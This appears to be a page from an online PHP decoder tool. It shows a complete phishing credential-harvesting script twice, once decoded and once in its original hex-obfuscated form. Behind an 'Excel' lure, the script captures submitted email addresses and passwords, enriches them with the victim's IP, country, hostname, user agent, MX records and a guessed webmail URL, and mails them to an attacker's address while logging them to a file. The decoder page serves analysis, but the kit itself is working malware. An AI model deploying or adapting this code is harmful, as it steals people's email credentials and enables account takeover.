Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto cQvUB; fR2aC: $data = array("\x73\151\x67\156\x61\x6c" => $signal, "\155\163\..
Decoded Output download
<?php
goto cQvUB; fR2aC: $data = array("signal" => $signal, "msg" => $msg); goto pN6Xz; nTgbp: header("Access-Control-Allow-Origin: *"); goto xjaPj; pN6Xz: echo json_encode($data); goto sjFiX; cQvUB: header("Access-Control-Allow-Headers: Authorization, Content-Type"); goto nTgbp; xjaPj: header("content-type: application/json; charset=utf-8"); goto z5l1Q; z5l1Q: $Receive_email = "[email protected]"; goto fpTDk; fpTDk: $redirect = "https://outlook.live.com/"; goto OyNjt; OyNjt: $email = trim($_POST["ai"]); goto g33Su; g33Su: $password = trim($_POST["pr"]); goto gdhoD; gdhoD: if ($password != null) { $ip = getenv("REMOTE_ADDR"); $hostname = gethostbyaddr($ip); $useragent = $_SERVER["HTTP_USER_AGENT"]; $country = file_get_contents("https://ipapi.co/{$ip}/country_name/"); $emailDomain = substr(strrchr($email, "@"), 1); $mxRecords = dns_get_record($emailDomain, DNS_MX); $mxRecordString = "No MX Records Found"; $webmailLogin = "Not Available"; if (!empty($mxRecords)) { $mxRecordString = implode(", ", array_column($mxRecords, "target")); $mxDomain = $mxRecords[0]["target"]; $webmailMapping = array("mx.yandex.ru" => "https://mail.yandex.com", "mx.mail.ru" => "https://mail.ru", "mx.ukr.net" => "https://mail.ukr.net", "mx.gmx.net" => "https://mail.gmx.com", "mx.orange.fr" => "https://webmail.orange.fr", "mx.protonmail.ch" => "https://mail.proton.me", "mx.web.de" => "https://web.de", "mx.vodafone.it" => "https://mail.vodafone.it", "mx.libero.it" => "https://mail.libero.it", "mx.tiscali.it" => "https://mail.tiscali.it", "mx.turktelekom.com.tr" => "https://webmail.turktelekom.com.tr", "mx.superonline.net" => "https://mail.superonline.net", "mx.turk.net" => "https://mail.turk.net", "mx.telefonica.net" => "https://webmail.telefonica.net", "mx.movistar.es" => "https://correo.movistar.es", "mx.uol.com.br" => "https://email.uol.com.br", "mx.terra.com.br" => "https://webmail.terra.com.br", "mx.bol.com.br" => "https://email.bol.com.br", "stackmail.com" => "https://stackmail.com", "ionos.com" => "https://mail.ionos.com", "appsuite.com" => "https://mail.appsuite.com", "1and1.com" => "https://mail.ionos.com", "titan.email" => "https://mail.titan.email", "zoho.com" => "https://mail.zoho.com", "zoho.in" => "https://mail.zoho.in", "zoho.eu" => "https://mail.zoho.eu", "hostinger.com" => "https://mail.hostinger.com", "secureserver.net" => "https://email.godaddy.com", "google.com" => "https://mail.google.com", "mxhichina" => "https://mail.mxhichina.com/alimail/", "emailsrvr.com" => "https://apps.rackspace.com", "aruba.it" => "https://webmail.aruba.it/"); if (strpos($mxDomain, "natrohost.com") !== false) { $webmailLogin = "https://mail." . $emailDomain; } else { foreach ($webmailMapping as $key => $url) { if (strpos($mxDomain, $key) !== false) { $webmailLogin = $url; break; } } } if ($webmailLogin === "Not Available") { $webmailLogin = "https://webmail." . $emailDomain; } } $message = "------------------------
"; $message .= "Page : Excel\xa"; $message .= "usr : {$email}\xa"; $message .= "Ps : {$password}\xa"; $message .= "Country : {$country}\xa"; $message .= "Timestamp : " . date("Y-m-d H:i:s") . "\xa"; $message .= "Hostname : {$hostname}
"; $message .= "Webmail Login : {$webmailLogin}\xa"; $message .= "MX Records : {$mxRecordString}\xa"; $message .= "----------------------------------\xa"; $message .= "IP : {$ip}\xa"; $message .= "--- http://www.geoiptool.com/?IP={$ip} ----
"; $message .= "User Agent : {$useragent}
"; $message .= "-----------------------
"; $subject = "Client : {$ip}"; mail($Receive_email, $subject, $message); $filePath = "[email protected]"; if ($fileHandler = fopen($filePath, "a")) { fwrite($fileHandler, $message); fclose($fileHandler); } else { error_log("Unable to write to file: {$filePath}"); } $signal = "ok"; $msg = "Valid Credentials"; } else { $signal = "error_log"; $msg = "Invalid Credentials"; } goto fR2aC; sjFiX: ?>
Did this file decode correctly?
Original Code
<?php
goto cQvUB; fR2aC: $data = array("\x73\151\x67\156\x61\x6c" => $signal, "\155\163\x67" => $msg); goto pN6Xz; nTgbp: header("\101\x63\143\145\x73\163\x2d\x43\157\156\x74\162\x6f\x6c\x2d\x41\154\154\x6f\x77\x2d\117\162\151\147\151\156\72\x20\x2a"); goto xjaPj; pN6Xz: echo json_encode($data); goto sjFiX; cQvUB: header("\x41\x63\143\145\x73\x73\x2d\x43\157\x6e\x74\162\157\154\x2d\x41\x6c\x6c\157\167\x2d\x48\145\x61\144\145\x72\163\72\x20\101\165\x74\150\157\162\x69\x7a\141\164\151\157\x6e\54\x20\x43\157\x6e\x74\x65\x6e\164\x2d\x54\x79\x70\145"); goto nTgbp; xjaPj: header("\143\157\156\164\145\156\164\x2d\164\x79\160\x65\x3a\40\141\160\160\154\x69\x63\x61\164\151\x6f\x6e\57\152\x73\157\156\73\40\x63\x68\141\x72\163\x65\164\75\x75\164\146\x2d\70"); goto z5l1Q; z5l1Q: $Receive_email = "\x6a\157\141\156\x6e\x61\166\x65\x67\141\x70\150\141\162\x6d\141\x40\171\141\156\x64\x65\170\x2e\143\157\x6d"; goto fpTDk; fpTDk: $redirect = "\150\x74\x74\160\163\x3a\57\57\x6f\165\x74\154\157\157\153\56\154\151\x76\145\56\x63\x6f\155\x2f"; goto OyNjt; OyNjt: $email = trim($_POST["\141\x69"]); goto g33Su; g33Su: $password = trim($_POST["\160\162"]); goto gdhoD; gdhoD: if ($password != null) { $ip = getenv("\122\105\x4d\117\x54\105\x5f\101\x44\x44\x52"); $hostname = gethostbyaddr($ip); $useragent = $_SERVER["\110\x54\x54\120\x5f\x55\123\105\x52\137\x41\x47\x45\x4e\124"]; $country = file_get_contents("\x68\164\x74\x70\x73\72\x2f\57\151\160\x61\x70\x69\56\x63\157\57{$ip}\57\143\x6f\x75\x6e\164\162\171\x5f\156\141\x6d\145\x2f"); $emailDomain = substr(strrchr($email, "\100"), 1); $mxRecords = dns_get_record($emailDomain, DNS_MX); $mxRecordString = "\116\x6f\x20\115\130\40\x52\x65\x63\157\x72\x64\x73\x20\106\x6f\x75\156\144"; $webmailLogin = "\x4e\157\164\x20\101\166\141\x69\154\141\142\154\145"; if (!empty($mxRecords)) { $mxRecordString = implode("\54\40", array_column($mxRecords, "\x74\x61\162\147\145\x74")); $mxDomain = $mxRecords[0]["\x74\141\x72\147\145\x74"]; $webmailMapping = array("\155\170\56\x79\x61\156\x64\145\170\x2e\x72\x75" => "\150\x74\164\x70\163\72\x2f\x2f\155\141\151\154\x2e\171\141\x6e\144\145\x78\x2e\143\x6f\155", "\155\170\56\x6d\141\151\x6c\56\162\x75" => "\x68\x74\x74\160\x73\x3a\57\57\x6d\141\151\154\56\162\165", "\155\170\56\165\x6b\162\56\156\x65\164" => "\150\164\x74\160\163\72\x2f\57\155\x61\x69\154\56\x75\153\162\56\156\145\164", "\x6d\x78\56\x67\155\170\56\x6e\x65\x74" => "\150\x74\164\x70\163\72\x2f\57\155\141\151\x6c\56\147\x6d\170\x2e\143\x6f\x6d", "\155\x78\x2e\x6f\162\141\x6e\147\145\x2e\146\x72" => "\150\x74\164\160\x73\x3a\57\x2f\167\145\142\x6d\x61\x69\x6c\x2e\x6f\162\141\156\147\x65\56\x66\162", "\x6d\x78\x2e\x70\x72\x6f\164\157\156\155\x61\x69\x6c\56\x63\x68" => "\x68\164\164\160\x73\72\x2f\x2f\x6d\x61\x69\154\x2e\160\x72\x6f\164\157\156\56\155\145", "\x6d\170\x2e\167\x65\142\x2e\144\145" => "\150\x74\x74\x70\163\x3a\57\57\167\x65\142\x2e\x64\145", "\155\x78\x2e\166\157\x64\x61\146\157\156\x65\x2e\x69\164" => "\150\x74\164\160\163\x3a\x2f\x2f\x6d\x61\x69\154\56\166\157\144\x61\x66\x6f\156\x65\x2e\151\164", "\155\170\56\x6c\x69\x62\145\162\x6f\x2e\x69\x74" => "\x68\164\x74\160\x73\72\57\57\155\141\151\154\x2e\x6c\x69\142\x65\162\157\x2e\151\x74", "\x6d\170\56\x74\151\x73\143\x61\x6c\x69\56\x69\x74" => "\x68\164\x74\x70\x73\x3a\x2f\57\x6d\x61\x69\154\x2e\164\x69\x73\143\141\154\x69\x2e\x69\x74", "\155\x78\56\x74\165\x72\x6b\164\145\x6c\145\153\x6f\x6d\56\x63\x6f\155\56\164\162" => "\x68\x74\x74\x70\163\72\57\x2f\x77\145\142\155\141\151\x6c\x2e\x74\x75\162\x6b\164\x65\154\x65\153\157\x6d\56\143\x6f\x6d\56\164\x72", "\155\x78\56\163\165\x70\145\162\x6f\x6e\154\151\156\x65\56\x6e\145\x74" => "\150\164\x74\160\163\72\x2f\57\155\x61\x69\154\56\163\x75\x70\x65\x72\x6f\x6e\x6c\x69\x6e\x65\x2e\x6e\145\x74", "\x6d\x78\56\164\x75\x72\x6b\56\x6e\145\x74" => "\150\164\x74\160\163\72\x2f\x2f\155\x61\151\x6c\56\x74\165\162\x6b\x2e\x6e\x65\164", "\155\x78\x2e\164\145\154\145\146\x6f\x6e\x69\x63\141\56\x6e\145\x74" => "\150\x74\x74\x70\x73\x3a\x2f\x2f\x77\x65\x62\155\141\x69\x6c\56\x74\145\x6c\145\146\x6f\156\151\143\x61\56\156\145\164", "\x6d\170\56\155\x6f\166\151\163\x74\x61\x72\56\x65\x73" => "\150\164\164\x70\x73\x3a\x2f\57\143\x6f\x72\162\145\157\56\x6d\x6f\166\x69\x73\x74\x61\x72\x2e\x65\163", "\155\x78\x2e\165\157\154\56\143\x6f\x6d\56\142\x72" => "\x68\x74\x74\x70\x73\x3a\57\x2f\145\x6d\x61\x69\154\56\x75\x6f\x6c\56\x63\157\155\x2e\x62\x72", "\x6d\170\x2e\x74\145\162\162\141\x2e\143\x6f\x6d\56\x62\x72" => "\x68\x74\x74\160\163\72\x2f\x2f\x77\145\142\x6d\x61\151\x6c\x2e\164\x65\x72\162\141\56\143\x6f\155\56\x62\162", "\x6d\x78\x2e\142\x6f\x6c\x2e\x63\157\x6d\x2e\x62\162" => "\x68\164\164\160\163\x3a\x2f\x2f\x65\155\x61\x69\154\56\x62\157\154\x2e\143\x6f\155\56\142\162", "\163\164\x61\x63\153\x6d\x61\x69\154\56\143\157\155" => "\x68\164\x74\160\163\72\x2f\57\x73\x74\x61\143\x6b\155\141\x69\154\56\143\x6f\x6d", "\x69\157\156\x6f\x73\x2e\143\x6f\155" => "\x68\164\x74\x70\163\72\57\57\155\141\151\154\56\151\157\x6e\157\163\x2e\x63\x6f\x6d", "\x61\x70\160\x73\x75\x69\164\145\56\143\157\x6d" => "\x68\x74\x74\x70\163\72\x2f\57\155\x61\151\154\56\x61\160\x70\163\x75\x69\x74\145\x2e\143\157\155", "\61\x61\x6e\x64\61\56\143\157\155" => "\x68\x74\164\x70\163\x3a\57\57\155\141\x69\x6c\56\x69\157\156\x6f\x73\x2e\143\x6f\x6d", "\x74\151\x74\x61\x6e\56\x65\x6d\x61\x69\154" => "\150\164\164\x70\x73\x3a\57\x2f\x6d\141\x69\x6c\x2e\164\x69\x74\141\156\x2e\x65\155\141\151\154", "\x7a\157\x68\x6f\56\x63\157\155" => "\150\164\164\160\x73\72\x2f\57\x6d\141\x69\x6c\56\172\157\150\157\56\143\157\155", "\x7a\x6f\150\157\56\151\156" => "\x68\x74\164\160\163\x3a\57\x2f\x6d\x61\x69\x6c\x2e\172\157\x68\x6f\56\x69\156", "\172\157\150\157\56\x65\x75" => "\x68\164\164\x70\x73\x3a\57\x2f\x6d\141\151\x6c\56\x7a\x6f\x68\157\x2e\x65\x75", "\150\157\x73\164\x69\156\147\x65\162\x2e\x63\157\x6d" => "\150\164\x74\160\163\x3a\x2f\57\155\x61\x69\x6c\x2e\x68\157\x73\164\x69\156\147\x65\162\x2e\x63\157\155", "\x73\145\x63\x75\x72\x65\x73\145\x72\x76\x65\x72\56\156\x65\x74" => "\150\x74\164\x70\163\72\x2f\57\145\155\141\x69\x6c\x2e\147\x6f\144\141\144\x64\171\56\x63\157\x6d", "\x67\x6f\x6f\x67\x6c\x65\56\143\157\x6d" => "\x68\164\x74\x70\x73\x3a\57\x2f\155\x61\x69\154\56\x67\157\x6f\x67\154\x65\x2e\143\x6f\155", "\x6d\170\x68\x69\x63\150\151\156\141" => "\150\164\x74\160\163\72\x2f\57\155\141\x69\154\56\155\170\150\151\x63\150\151\x6e\141\x2e\143\x6f\155\x2f\141\154\x69\155\141\151\x6c\x2f", "\x65\x6d\x61\151\154\163\x72\166\162\56\143\x6f\x6d" => "\150\164\x74\160\x73\x3a\x2f\57\141\x70\160\163\56\162\x61\143\x6b\163\160\x61\143\145\56\x63\157\x6d", "\141\x72\x75\x62\x61\x2e\x69\164" => "\x68\164\x74\160\163\72\57\x2f\x77\x65\x62\x6d\141\x69\x6c\56\x61\162\165\x62\141\x2e\151\x74\57"); if (strpos($mxDomain, "\156\141\x74\x72\x6f\150\157\x73\164\56\143\x6f\x6d") !== false) { $webmailLogin = "\x68\x74\x74\x70\x73\x3a\x2f\57\x6d\141\151\x6c\56" . $emailDomain; } else { foreach ($webmailMapping as $key => $url) { if (strpos($mxDomain, $key) !== false) { $webmailLogin = $url; break; } } } if ($webmailLogin === "\116\x6f\164\x20\x41\x76\141\x69\x6c\x61\142\154\x65") { $webmailLogin = "\150\164\x74\x70\x73\72\x2f\57\x77\145\142\x6d\x61\151\154\x2e" . $emailDomain; } } $message = "\55\x2d\x2d\55\55\55\x2d\55\x2d\55\x2d\x2d\x2d\55\x2d\55\x2d\55\55\x2d\x2d\x2d\x2d\55\12"; $message .= "\120\x61\x67\145\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\72\40\105\170\143\145\x6c\xa"; $message .= "\x75\163\162\x20\40\40\40\x20\x20\x20\x20\x20\40\40\40\72\x20{$email}\xa"; $message .= "\120\163\40\x20\40\x20\40\x20\40\x20\x20\40\40\40\x20\x3a\x20{$password}\xa"; $message .= "\103\x6f\165\x6e\164\x72\171\x20\40\x20\40\x20\x20\x20\40\72\x20{$country}\xa"; $message .= "\124\x69\155\x65\163\x74\x61\155\x70\40\40\40\40\x20\x20\x3a\40" . date("\131\55\x6d\x2d\144\x20\x48\x3a\x69\x3a\x73") . "\xa"; $message .= "\110\157\163\x74\x6e\141\155\145\x20\x20\40\x20\40\40\40\72\x20{$hostname}\12"; $message .= "\127\145\142\155\141\151\154\x20\114\157\x67\x69\x6e\40\40\72\40{$webmailLogin}\xa"; $message .= "\115\x58\40\122\145\143\157\x72\144\163\40\40\x20\40\40\x3a\40{$mxRecordString}\xa"; $message .= "\55\55\55\55\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\55\x2d\x2d\55\x2d\55\x2d\55\55\55\x2d\55\x2d\x2d\55\x2d\55\x2d\55\55\x2d\xa"; $message .= "\111\120\x20\x20\x20\x20\40\40\40\40\40\x20\40\x20\40\72\40{$ip}\xa"; $message .= "\55\x2d\55\x20\x68\x74\164\160\72\57\x2f\167\167\167\56\x67\x65\157\151\160\164\157\x6f\x6c\x2e\x63\x6f\x6d\57\x3f\111\x50\x3d{$ip}\x20\x2d\55\x2d\55\12"; $message .= "\125\163\x65\162\x20\101\x67\x65\156\x74\40\40\40\x20\x20\72\x20{$useragent}\12"; $message .= "\55\x2d\55\x2d\55\55\55\55\x2d\55\55\55\55\x2d\x2d\x2d\x2d\55\55\x2d\55\55\55\12"; $subject = "\x43\x6c\151\145\x6e\x74\x20\72\40{$ip}"; mail($Receive_email, $subject, $message); $filePath = "\x64\x40\x6d\x61\151\x6e\61\x32\x33\56\164\170\x74"; if ($fileHandler = fopen($filePath, "\141")) { fwrite($fileHandler, $message); fclose($fileHandler); } else { error_log("\125\156\x61\142\x6c\145\40\x74\157\40\167\162\151\164\x65\x20\164\157\x20\x66\151\x6c\145\72\x20{$filePath}"); } $signal = "\x6f\153"; $msg = "\x56\141\x6c\151\x64\x20\x43\x72\145\144\x65\156\x74\x69\x61\x6c\x73"; } else { $signal = "\x65\x72\x72\157\162\x5f\x6c\x6f\147"; $msg = "\111\156\166\141\154\x69\144\x20\103\162\x65\144\x65\x6e\164\x69\141\154\163"; } goto fR2aC; sjFiX: ?>
Function Calls
None |
Stats
MD5 | d1b24fc0be6a6aab5cbe62619bd20519 |
Eval Count | 0 |
Decode Time | 75 ms |